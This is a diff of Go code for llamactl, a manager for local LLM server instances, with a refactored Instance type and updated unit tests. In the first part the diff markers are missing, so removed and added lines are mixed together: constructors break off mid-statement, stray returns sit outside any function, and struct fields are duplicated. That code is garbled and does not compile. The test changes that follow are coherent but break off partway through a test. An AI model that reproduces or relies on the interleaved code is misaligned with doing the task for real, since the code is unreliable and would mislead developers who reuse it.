opts.validateAndApplyDefaults(name, globalInstanceSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalInstanceSettings.LogsDir)
// Create status wrapper
status := newStatus(Stopped)
status.onStatusChange = onStatusChange
return &Process{
// Create options wrapper
options := newOptions(opts)
instance := &Instance{
Name: name,
options: options,
globalInstanceSettings: globalInstanceSettings,
globalBackendSettings: globalBackendSettings,
logger: logger,
timeProvider: realTimeProvider{},
globalNodesConfig: globalNodesConfig,
localNodeName: localNodeName,
Created: time.Now().Unix(),
Status: Stopped,
onStatusChange: onStatusChange,
status: status,
}
var err error
instance.proxy, err = newProxy(instance)
if err != nil {
log.Println("Warning: Failed to create proxy for instance", instance.Name, "-", err)
}
// Only create logger, proxy, and process for local instances
if !instance.IsRemote() {
instance.logger = newLogger(name, globalInstanceSettings.LogsDir)
instance.process = newProcess(instance)
}
return instance
}
// Start starts the instance by delegating to its process component.
// It returns an error when the instance has no process component, which is
// the case for remote instances.
func (i *Instance) Start() error {
	if proc := i.process; proc != nil {
		return proc.start()
	}
	return fmt.Errorf("instance %s has no process component (remote instances cannot be started locally)", i.Name)
}
// Stop stops the instance by delegating to its process component.
// It returns an error when the instance has no process component, which is
// the case for remote instances.
func (i *Instance) Stop() error {
	if proc := i.process; proc != nil {
		return proc.stop()
	}
	return fmt.Errorf("instance %s has no process component (remote instances cannot be stopped locally)", i.Name)
}
// Restart restarts the instance by delegating to its process component.
// It returns an error when the instance has no process component, which is
// the case for remote instances.
func (i *Instance) Restart() error {
	if proc := i.process; proc != nil {
		return proc.restart()
	}
	return fmt.Errorf("instance %s has no process component (remote instances cannot be restarted locally)", i.Name)
}
// WaitForHealthy waits for the instance to become healthy by delegating to
// its process component; timeout is passed through unchanged. It returns an
// error when the instance has no process component, which is the case for
// remote instances.
func (i *Instance) WaitForHealthy(timeout int) error {
	if proc := i.process; proc != nil {
		return proc.waitForHealthy(timeout)
	}
	return fmt.Errorf("instance %s has no process component (remote instances cannot be health checked locally)", i.Name)
}
// GetOptions returns the instance's current options as provided by its
// options wrapper, or nil when no wrapper is set.
func (i *Instance) GetOptions() *Options {
	if wrapper := i.options; wrapper != nil {
		return wrapper.get()
	}
	return nil
}
// GetStatus returns the instance's current status as provided by its status
// wrapper, falling back to Stopped when no wrapper is set.
func (i *Instance) GetStatus() Status {
	if wrapper := i.status; wrapper != nil {
		return wrapper.get()
	}
	return Stopped
}
// SetStatus stores s through the instance's status wrapper. It is a no-op
// when no status wrapper is set.
func (i *Instance) SetStatus(s Status) {
	if i.status == nil {
		return
	}
	i.status.set(s)
}
func (i *Process) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}
func (i *Process) GetPort() int {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
return i.options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
return i.options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
return i.options.VllmServerOptions.Port
}
}
// IsRunning returns true if the status is Running
func (i *Instance) IsRunning() bool {
if i.status == nil {
return false
}
return 0
return i.status.isRunning()
}
func (i *Process) GetHost() string {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
return i.options.LlamaServerOptions.Host
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
return i.options.MlxServerOptions.Host
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
return i.options.VllmServerOptions.Host
}
}
}
return ""
}
func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
if options == nil {
// SetOptions sets the options
func (i *Instance) SetOptions(opts *Options) {
if opts == nil {
log.Println("Warning: Attempted to set nil options on instance", i.Name)
return
}
// Validate and copy options
options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
// Preserve the original nodes to prevent changing instance location
if i.options != nil && i.options.get() != nil {
opts.Nodes = i.options.get().Nodes
}
// Validate and copy options
opts.validateAndApplyDefaults(i.Name, i.globalInstanceSettings)
if i.options != nil {
i.options.set(opts)
}
i.options = options
// Clear the proxy so it gets recreated with new options
i.proxy = nil
if i.proxy != nil {
i.proxy.clear()
}
}
// SetTimeProvider sets a custom time provider for testing
func (i *Process) SetTimeProvider(tp TimeProvider) {
i.timeProvider = tp
func (i *Instance) SetTimeProvider(tp TimeProvider) {
if i.proxy != nil {
i.proxy.setTimeProvider(tp)
}
}
// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()
if i.proxy != nil {
return i.proxy, nil
}
func (i *Instance) GetHost() string {
if i.options == nil {
return nil, fmt.Errorf("instance %s has no options set", i.Name)
return "localhost"
}
return i.options.GetHost()
}
// GetPort returns the port reported by the options component,
// or 0 when the instance has no options component.
func (i *Instance) GetPort() int {
	if i.options != nil {
		return i.options.GetPort()
	}
	return 0
}
func (i *Instance) IsRemote() bool {
opts := i.GetOptions()
if opts == nil {
return false
}
var host string
var port int
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.options.LlamaServerOptions != nil {
host = i.options.LlamaServerOptions.Host
port = i.options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if i.options.MlxServerOptions != nil {
host = i.options.MlxServerOptions.Host
port = i.options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if i.options.VllmServerOptions != nil {
host = i.options.VllmServerOptions.Host
port = i.options.VllmServerOptions.Port
}
// If no nodes specified, it's a local instance
if len(opts.Nodes) == 0 {
return false
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
// If the local node is in the nodes map, treat it as a local instance
if _, isLocal := opts.Nodes[i.localNodeName]; isLocal {
return false
}
proxy := httputil.NewSingleHostReverseProxy(targetURL)
// Otherwise, it's a remote instance
return true
}
proxy.ModifyResponse = func(resp *http.Response) error {
// Remove CORS headers from llama-server response to avoid conflicts
// llamactl will add its own CORS headers
resp.Header.Del("Access-Control-Allow-Origin")
resp.Header.Del("Access-Control-Allow-Methods")
resp.Header.Del("Access-Control-Allow-Headers")
resp.Header.Del("Access-Control-Allow-Credentials")
resp.Header.Del("Access-Control-Max-Age")
resp.Header.Del("Access-Control-Expose-Headers")
// GetLogs retrieves the last num_lines lines of logs from the instance.
// It returns an error when the instance has no logger component.
func (i *Instance) GetLogs(num_lines int) (string, error) {
	if i.logger != nil {
		return i.logger.getLogs(num_lines)
	}
	return "", fmt.Errorf("instance %s has no logger (remote instances don't have logs)", i.Name)
}
// LastRequestTime returns the last request time as a Unix timestamp,
// or 0 when the instance has no proxy component.
func (i *Instance) LastRequestTime() int64 {
	if i.proxy != nil {
		return i.proxy.getLastRequestTime()
	}
	return 0
}
// UpdateLastRequestTime updates the last request access time for the instance
// via the proxy. It is a no-op when the instance has no proxy component.
func (i *Instance) UpdateLastRequestTime() {
	if i.proxy == nil {
		return
	}
	i.proxy.updateLastRequestTime()
}
// ShouldTimeout checks if the instance should timeout based on idle time.
// The decision is delegated to the proxy component; without one the answer
// is always false.
func (i *Instance) ShouldTimeout() bool {
	return i.proxy != nil && i.proxy.shouldTimeout()
}
// GetInflightRequests returns the current number of inflight requests as
// reported by the proxy component, or 0 when there is no proxy component.
func (i *Instance) GetInflightRequests() int32 {
	if i.proxy != nil {
		return i.proxy.getInflightRequests()
	}
	return 0
}
// ServeHTTP serves HTTP requests through the proxy with request tracking and
// shutdown handling. It returns an error when the instance has no proxy
// component; otherwise it returns whatever the proxy's serveHTTP returns.
func (i *Instance) ServeHTTP(w http.ResponseWriter, r *http.Request) error {
	if i.proxy != nil {
		return i.proxy.serveHTTP(w, r)
	}
	return fmt.Errorf("instance %s has no proxy component", i.Name)
}
// getCommand asks the backend options for the command to run, passing the
// global backend settings. It returns an empty string when no options are set.
func (i *Instance) getCommand() string {
	if current := i.GetOptions(); current != nil {
		return current.BackendOptions.GetCommand(i.globalBackendSettings)
	}
	return ""
}
// buildCommandArgs asks the backend options to build the command-line
// arguments, passing the global backend settings. It returns nil when no
// options are set.
//
// The stray `i.proxy = proxy` assignment was removed: `proxy` is not defined
// in this function, and building arguments must not touch the proxy field.
func (i *Instance) buildCommandArgs() []string {
	opts := i.GetOptions()
	if opts == nil {
		return nil
	}
	return opts.BackendOptions.BuildCommandArgs(i.globalBackendSettings)
}
return i.proxy, nil
// buildEnvironment asks the backend options to build the process environment
// from the global backend settings and the per-instance Environment map.
// It returns nil when no options are set.
func (i *Instance) buildEnvironment() map[string]string {
	if current := i.GetOptions(); current != nil {
		return current.BackendOptions.BuildEnvironment(i.globalBackendSettings, current.Environment)
	}
	return nil
}
// MarshalJSON implements json.Marshaler for Instance
func (i *Process) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
func (i *Instance) MarshalJSON() ([]byte, error) {
// Get options
opts := i.GetOptions()
// Determine if docker is enabled for this instance's backend
var dockerEnabled bool
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
if i.globalBackendSettings != nil && i.globalBackendSettings.LlamaCpp.Docker != nil && i.globalBackendSettings.LlamaCpp.Docker.Enabled {
dockerEnabled = true
}
case backends.BackendTypeVllm:
if i.globalBackendSettings != nil && i.globalBackendSettings.VLLM.Docker != nil && i.globalBackendSettings.VLLM.Docker.Enabled {
dockerEnabled = true
}
case backends.BackendTypeMlxLm:
// MLX does not support docker currently
}
}
dockerEnabled := opts.BackendOptions.IsDockerEnabled(i.globalBackendSettings)
// Use anonymous struct to avoid recursion
type Alias Process
return json.Marshal(&struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
DockerEnabled bool `json:"docker_enabled,omitempty"`
Name string `json:"name"`
Status *status `json:"status"`
Created int64 `json:"created,omitempty"`
Options *options `json:"options,omitempty"`
DockerEnabled bool `json:"docker_enabled,omitempty"`
}{
Alias: (*Alias)(i),
Name: i.Name,
Status: i.status,
Created: i.Created,
Options: i.options,
DockerEnabled: dockerEnabled,
})
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Process) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias Process
func (i *Instance) UnmarshalJSON(data []byte) error {
// Explicitly deserialize to match MarshalJSON format
aux := &struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"`
}{
Alias: (*Alias)(i),
}
Name string `json:"name"`
Status *status `json:"status"`
Created int64 `json:"created,omitempty"`
Options *options `json:"options,omitempty"`
}{}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Handle options with validation and defaults
if aux.Options != nil {
aux.Options.ValidateAndApplyDefaults(i.Name, i.globalInstanceSettings)
i.options = aux.Options
}
// Set the fields
i.Name = aux.Name
i.Created = aux.Created
i.status = aux.Status
i.options = aux.Options
return nil
}

View File

@@ -3,48 +3,53 @@ package instance_test
import (
"encoding/json"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"testing"
"time"
)
func TestNewInstance(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
Instances: config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
},
Nodes: map[string]config.NodeConfig{},
LocalNode: "main",
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst := instance.New("test-instance", globalConfig, options, mockOnStatusChange)
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
@@ -55,8 +60,8 @@ func TestNewInstance(t *testing.T) {
// Check that options were properly set with defaults applied
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
@@ -72,114 +77,89 @@ func TestNewInstance(t *testing.T) {
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
// Test that explicit values override defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &instance.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
optionsWithOverrides := &instance.Options{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst2 := instance.New("test-override", globalConfig, optionsWithOverrides, mockOnStatusChange)
opts2 := inst2.GetOptions()
instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
if opts2.AutoRestart == nil || *opts2.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
if opts2.MaxRestarts == nil || *opts2.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts2.MaxRestarts)
}
}
func TestSetOptions(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
Instances: config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
},
Nodes: map[string]config.NodeConfig{},
LocalNode: "main",
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
initialOptions := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, initialOptions, mockOnStatusChange)
inst := instance.New("test-instance", globalConfig, initialOptions, mockOnStatusChange)
// Update options
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
newOptions := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
},
}
inst.SetOptions(newOptions)
opts := inst.GetOptions()
if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
}
if inst.GetPort() != 8081 {
t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
@@ -191,103 +171,35 @@ func TestSetOptions(t *testing.T) {
}
}
func TestGetProxy(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Get proxy for the first time
proxy1, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{Command: "llama-server"},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
Nodes: map[string]config.NodeConfig{},
LocalNode: "main",
}
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
inst := instance.New("test-instance", globalConfig, options, nil)
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
data, err := json.Marshal(instance)
data, err := json.Marshal(inst)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
// Verify by unmarshaling and checking key fields
var result map[string]any
err = json.Unmarshal(data, &result)
if err != nil {
if err := json.Unmarshal(data, &result); err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
@@ -297,37 +209,9 @@ func TestMarshalJSON(t *testing.T) {
if result["status"] != "stopped" {
t.Errorf("Expected status 'stopped', got %v", result["status"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
if result["options"] == nil {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
// Check backend type
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
}
// Check backend options
backend_options_data, ok := options_map["backend_options"]
if !ok {
t.Error("Expected backend_options to be included in JSON")
}
backend_options_map, ok := backend_options_data.(map[string]any)
if !ok {
t.Error("Expected backend_options to be a map")
}
if backend_options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
}
if backend_options_map["port"] != float64(8080) {
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
}
}
func TestUnmarshalJSON(t *testing.T) {
@@ -345,7 +229,7 @@ func TestUnmarshalJSON(t *testing.T) {
}
}`
var inst instance.Process
var inst instance.Instance
err := json.Unmarshal([]byte(jsonData), &inst)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
@@ -362,14 +246,14 @@ func TestUnmarshalJSON(t *testing.T) {
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
if opts.BackendOptions.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendOptions.BackendType)
}
if opts.LlamaServerOptions == nil {
if opts.BackendOptions.LlamaServerOptions == nil {
t.Fatal("Expected LlamaServerOptions to be set")
}
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
if opts.BackendOptions.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.BackendOptions.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
@@ -382,7 +266,7 @@ func TestUnmarshalJSON(t *testing.T) {
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
func TestCreateOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
@@ -413,40 +297,45 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
},
}
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
globalConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
Instances: config.InstancesConfig{
LogsDir: "/tmp/test",
},
VLLM: config.BackendSettings{
Command: "vllm",
Args: []string{"serve"},
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
Nodes: map[string]config.NodeConfig{},
LocalNode: "main",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
options := &instance.Options{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
mockOnStatusChange := func(oldStatus, newStatus instance.Status) {}
instance := instance.NewInstance("test", backendConfig, globalSettings, options, mockOnStatusChange)
instance := instance.New("test", globalConfig, options, mockOnStatusChange)
opts := instance.GetOptions()
if opts.MaxRestarts == nil {
@@ -463,3 +352,295 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
})
}
}
// TestStatusChangeCallback verifies that SetStatus invokes the status-change
// callback and hands it the previous (Stopped) and new (Running) status.
func TestStatusChangeCallback(t *testing.T) {
	cfg := &config.AppConfig{
		Backends: config.BackendConfig{
			LlamaCpp: config.BackendSettings{Command: "llama-server"},
		},
		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
		Nodes:     map[string]config.NodeConfig{},
		LocalNode: "main",
	}
	opts := &instance.Options{
		BackendOptions: backends.Options{
			BackendType: backends.BackendTypeLlamaCpp,
			LlamaServerOptions: &backends.LlamaServerOptions{
				Model: "/path/to/model.gguf",
			},
		},
	}

	// Record what the callback receives so it can be inspected afterwards.
	var (
		invoked  bool
		from, to instance.Status
	)
	recorder := func(oldStatus, newStatus instance.Status) {
		from, to = oldStatus, newStatus
		invoked = true
	}

	inst := instance.New("test", cfg, opts, recorder)
	inst.SetStatus(instance.Running)

	if !invoked {
		t.Error("Expected status change callback to be called")
	}
	if from != instance.Stopped {
		t.Errorf("Expected old status Stopped, got %v", from)
	}
	if to != instance.Running {
		t.Errorf("Expected new status Running, got %v", to)
	}
}
// TestSetOptions_NodesPreserved verifies that SetOptions keeps the node set
// the instance was created with while still applying the other option changes.
func TestSetOptions_NodesPreserved(t *testing.T) {
	cfg := &config.AppConfig{
		Backends: config.BackendConfig{
			LlamaCpp: config.BackendSettings{Command: "llama-server"},
		},
		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
		Nodes:     map[string]config.NodeConfig{},
		LocalNode: "main",
	}

	// optionsFor builds llama.cpp options for a node set and a model path.
	optionsFor := func(nodes map[string]struct{}, model string) *instance.Options {
		return &instance.Options{
			Nodes: nodes,
			BackendOptions: backends.Options{
				BackendType: backends.BackendTypeLlamaCpp,
				LlamaServerOptions: &backends.LlamaServerOptions{
					Model: model,
				},
			},
		}
	}

	cases := []struct {
		name          string
		initialNodes  map[string]struct{}
		updateNodes   map[string]struct{}
		expectedNodes map[string]struct{}
	}{
		{
			name:          "nil nodes preserved as nil",
			initialNodes:  nil,
			updateNodes:   map[string]struct{}{"worker1": {}},
			expectedNodes: nil,
		},
		{
			name:          "empty nodes preserved as empty",
			initialNodes:  map[string]struct{}{},
			updateNodes:   map[string]struct{}{"worker1": {}},
			expectedNodes: map[string]struct{}{},
		},
		{
			name:          "existing nodes preserved",
			initialNodes:  map[string]struct{}{"worker1": {}, "worker2": {}},
			updateNodes:   map[string]struct{}{"worker3": {}},
			expectedNodes: map[string]struct{}{"worker1": {}, "worker2": {}},
		},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			inst := instance.New("test", cfg, optionsFor(tc.initialNodes, "/path/to/model.gguf"), nil)

			// The update carries a different node set, which should be ignored.
			inst.SetOptions(optionsFor(tc.updateNodes, "/path/to/new-model.gguf"))

			got := inst.GetOptions()

			// Nodes must match the initial set.
			if want, have := len(tc.expectedNodes), len(got.Nodes); have != want {
				t.Errorf("Expected %d nodes, got %d", want, have)
			}
			for node := range tc.expectedNodes {
				if _, ok := got.Nodes[node]; !ok {
					t.Errorf("Expected node %s to exist", node)
				}
			}

			// Everything else must reflect the update.
			if model := got.BackendOptions.LlamaServerOptions.Model; model != "/path/to/new-model.gguf" {
				t.Errorf("Expected model to be updated to '/path/to/new-model.gguf', got %q", model)
			}
		})
	}
}
// TestProcessErrorCases verifies that Stop fails on an instance that is not
// running and that Start fails on an instance already marked as running.
func TestProcessErrorCases(t *testing.T) {
	cfg := &config.AppConfig{
		Backends: config.BackendConfig{
			LlamaCpp: config.BackendSettings{Command: "llama-server"},
		},
		Instances: config.InstancesConfig{LogsDir: "/tmp/test"},
		Nodes:     map[string]config.NodeConfig{},
		LocalNode: "main",
	}
	opts := &instance.Options{
		BackendOptions: backends.Options{
			BackendType: backends.BackendTypeLlamaCpp,
			LlamaServerOptions: &backends.LlamaServerOptions{
				Model: "/path/to/model.gguf",
			},
		},
	}
	inst := instance.New("test", cfg, opts, nil)

	// A freshly created instance is not running, so Stop must be rejected.
	if stopErr := inst.Stop(); stopErr == nil {
